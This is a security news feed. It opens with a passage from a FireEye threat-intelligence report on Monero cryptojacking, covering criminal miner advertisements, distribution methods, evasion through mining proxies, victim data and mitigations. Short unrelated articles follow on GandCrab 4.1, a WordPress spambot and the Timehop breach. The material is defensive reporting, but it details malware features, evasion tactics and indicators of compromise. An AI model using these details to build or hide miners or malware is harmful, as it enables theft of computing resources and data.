The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities

XMR-STACK

MINERGATE

XMRMINER

CCMINER

XMRIG

CLAYMORE

SGMINER

CAST XMR

LUKMINER

CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
  • Windows Task Manager
  • Process Killer
  • KillProcess
  • System Explorer
  • Process Explorer
  • AnVir
  • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.

The electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems
Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.
Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

california_540_tax_form_2013_instructions.exe

state_bank_of_india_money_transfer_agency.exe

format_transfer_sms_banking_bni_ke_bca.exe

confirmation_receipt_letter_sample.exe

sbi_online_apply_2015_po.exe

estimated_tax_payment_coupon_irs.exe

how_to_add_a_non_us_bank_account_to_paypal.exe

western_union_money_transfer_from_uk_to_bangladesh.exe

can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe

how_to_open_a_business_bank_account_with_bad_credit_history.exe

apply_for_sbi_credit_card_online.exe

list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.


Figure 15: Stratum subscription request parameters

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

A few days after discovery of GandCrab ransomware ver 4.0, experts found 4.1 version

Security experts from Fortinet recently detected a new version of the GandCrab ransomware, ver 4.1, that is being distributed through compromised websites

A few days ago, I wrote about the return of the GandCrab ransomware (v4), a new version appeared in the threat landscape and experts at BleepingComputer first reported it.

GandCrab ransomware is a young threat, it first appeared in the wild early this year, but rapidly evolved and it authors improves it across the months. As of March, the ransomware had infected over 50,000 systems and netted its operators over $600,000 in ransom payments.

Security experts from Fortinet recently detected a new version of the threat, the GandCrab ransomware 4.1 that is being distributed through compromised websites designed to appear like download sites for cracked applications.

As the GandCrab ransomware 4 version, the new variant uses the Salsa2.0 stream cipher to encrypt data instead of the RSA-2048 encryption that was used in early versions of the threat.

The code of the latest variant 4.1 includes a list of websites to which the malware connects to sends data related to the infected machine (i.e. IP address, username, computer name, network domain, and, if present, a list of anti-malware tools on the system).

“Only two days after the release of GandCrab 4.0, FortiGuard Labs found a newer version (v4.1) being distributed using the same method, which is through compromised websites disguised as download sites for cracked applications.” reads the analysis published by Fortinet.

“With this new version, GandCrab has added a network communication tactic that was not observed in the previous version.”

gandcrab ransomware

Why does the new variant send data to a large number of websites?

According to Fortinet, there is no evidence that those websites in the hard-coded list have actually been compromised, this circumstance suggests the authors of the malware are testing the functionality or have put it there as a diversionary tactic.

“However, we found no definitive evidence that the hard-coded websites included in the malware had actually ever been compromised to act as servers or download sites for GandCrab.” continues the analysis.

“Even more curious, the fact is that sending victim information to all live hosts in the list is illogical in a practical sense, given that a single successful send would have been enough for its purposes. With these points in mind, we have started to think that this function is either experimental, or simply there to divert analysis and that the URLs included in the list are just victims of a bad humour.”

The analysis of the ransomware revealed that the GandCrab ransomware 4.1 kills numerous processes that can interfere with the file encryption process. For example, it kills msftesql.exe, sqlagent.exe, oracle.exe, msaccess.exe, powerpnt.exe, and wordpad.exe to encrypt high-value files used by most popular applications, such as Microsoft Office Files, Steam, Oracle, etc.

The experts from Fortinet highlighted that there is no evidence that the GandCrab ransomware 4.1 is also able to spread via SMB shares, such as WannaCry and Petya/NotPetya.

“Over the past few days, numerous reports have been circulating claiming that this version of the GandCrab malware can self-propagate via an “SMB exploit”” continues the analysis.

GandCrab ransomware 4

“However, in spite of this string, we could not find any actual function that resembles the reported exploit capability. (It may also be relevant to report that this string was actually first found in v4.0 and not in v4.1, at least in the samples that we have analysed.) Since this string is not connected to any actual exploit spreading function that we could uncover, it seems much more likely that it is simply referring to the encryption of network shares, and not for any sort of exploit propagation.”

Summarizing the threat continues to evolve, but it can not spread via SMB shares yet.

Pierluigi Paganini

(Security Affairs – gandcrab ransomware 4.1, cybercrime)

The post A few days after discovery of GandCrab ransomware ver 4.0, experts found 4.1 version appeared first on Security Affairs.

Spambot aims at targets WordPress sites in World Cup-Themed spam scam

Imperva observed a spambot targeting WordPress sites aimed at tricking victims into clicking on links to sites offering betting services on FIFA World Cup

Security experts from Imperva recently observed a spike in spam activity directed at WordPress websites, attackers aimed at tricking victims into clicking on links to sites offering betting services on the 2018 FIFA World Cup games.

Imperva monitored the activity of a botnet used to spread meaningless text messages generated from a template to comments sections in blogs, news articles, and other web sites that allow people to comment.

“Turns out the attack was launched by a botnet and implemented in the form of comment SPAM – meaningless, generic text generated from a template and posted in the comment sections of blogs, news articles etc; linking to pay-per-click commercial or suspicious sites looking to scam you or phish for your passwords.” reads the report published Imperva.

The spambot was used to post comments to the same Uniform Resource Identifier (URI) across different WordPress sites indiscriminately and without regard for whether the site is has a comments section or is affected by exploitable known issues.

The comments are generated starting from this template that is known since at least 2013. The template allows to automatically create slightly different versions of the same message to use in spam campaigns.

“Our analysis found that the top 10 links advertised by the botnet lead to World Cup betting sites. Interestingly, eight of the top advertised sites contained links to the same betting site, hinting that they might be connected in a way.” continues Imperva.

World Cup betting sites

“We found that the botnet advertised over 1000 unique URLs, most of them appear multiple times. In many cases, the botnet used different techniques such as URL redirection and URL-shortening services to mask the true destination of the advertised link.”

According to the experts, the spambot is still small, it is composed of just 1,200 unique IPs with up to 700 daily unique IPs. The experts discovered that botnet has also been using URL-shortening, URL redirection, and other techniques to masquerade the landing sites of advertised links in its spam messages.

In the weeks before the World Cup, the spambot was being used in remote code execution attacks and other non-SPAM attacks on WordPress sites

Spambot World Cup

Just after the beginning of the 2018 World Cup, the botnet activity was focused on comment spam, a circumstance that suggests the malicious infrastructure is available for hire.

“A possible explanation is that the botnet is for hire. The malicious activity we’ve seen at first was either paid for or simply the botnet’s attempt to grow itself. Then, it was hired by these betting sites to advertise them and increase their SEO.” continues the analysis.

Comment spam is a well-known activity in the threat landscape, the most common countermeasure it to blacklist IPs originating spams messages and also the URLs that they advertise.

WordPress also has several Plug-ins that cuold defeat this boring activity.

“Although comment SPAM has been with us for more than a decade — and doesn’t seem like it’s going away anytime soon — there are numerous solutions ranging from dedicated plugins that block comments that look SPAMmy, to WAF services.” concluded Imperva.

Pierluigi Paganini

(Security Affairs – spambot, World Cup spam)

The post Spambot aims at targets WordPress sites in World Cup-Themed spam scam appeared first on Security Affairs.

What is the Tor Browser? How it works and how it can help you protect your identity online

Move over “dark web,” the Tor Browser will keep you safe from snoops. The Tor Browser is a web broswer that anonymizes your web traffic using the Tor network, making it

The post What is the Tor Browser? How it works and how it can help you protect your identity online appeared first on The Cyber Security Place.

Timehop provides additional details on the recent security breach

Timehop has recently announced to have suffered a data breach that affected 21 million user accounts. The company now shares additional details about the incident.

Timehop service aims to help people in finding new ways to connect with each other by analyzing past activities, earlier this month, the company revealed that one or more malicious hackers gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users.

The security breach also exposed access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. The tokens have been quickly revoked and currently don’t work.

Wednesday the company provided an update on the incident adding that further info was exposed, including dates of birth, genders, and country codes.

timehop

Earlier reports of “up to 21 million emails” were correct. However we now provide the following breakdown of Personally Identifiable Information (PII) that was breached, and the combinations contained in records” reads the update provided by the company.

Type of Personal Data Combination # of Breached Records # of Breached GDPR Records
Name, email, phone, DOB 3.3 million 174,000
Name, email address, phone 3.4 million 181,000
Name, email address, DOB 13.6 million 2.2 million
Name, phone number, DOB 3.6 million 189,000
Name and email address 18.6 million 2.9 million
Name and phone number 3.7 million 198,000
Name and DOB 14.8 million 2.5 million
Name total 20.4 million 3.8 million
DOB total 15.5 million 2.6 million
Email addresses total 18.6 million 2.9 million
Gender designation total 9.2 million 2.6 million
Phone numbers total 4.9 million 243,000

The company provided a detailed analysis of exposed info, specifically for the affected PII records in compliance with the introduced GDPR.

According to the company, hackers first breached into its systems on December 19, 2017, using an employee’s credentials for the company’s cloud computing environment.

The attackers accessed the systems through an IP address in the Netherlands.

In a first phase, the hacker conducted a reconnaissance, at the time the compromised environment had not stored any personal information. In early April, the company moved personal information to the compromised database and the attackers found it only on June 22.

On July 4, the hacker exfiltrated the data and changed its password. The activity was noticed by the company in nearly 24 hours.

“They did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” reads the technical analysis published by Timehop. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”

Pierluigi Paganini

(Security Affairs – Timehophacking)

The post Timehop provides additional details on the recent security breach appeared first on Security Affairs.

Security newsround: July 2018

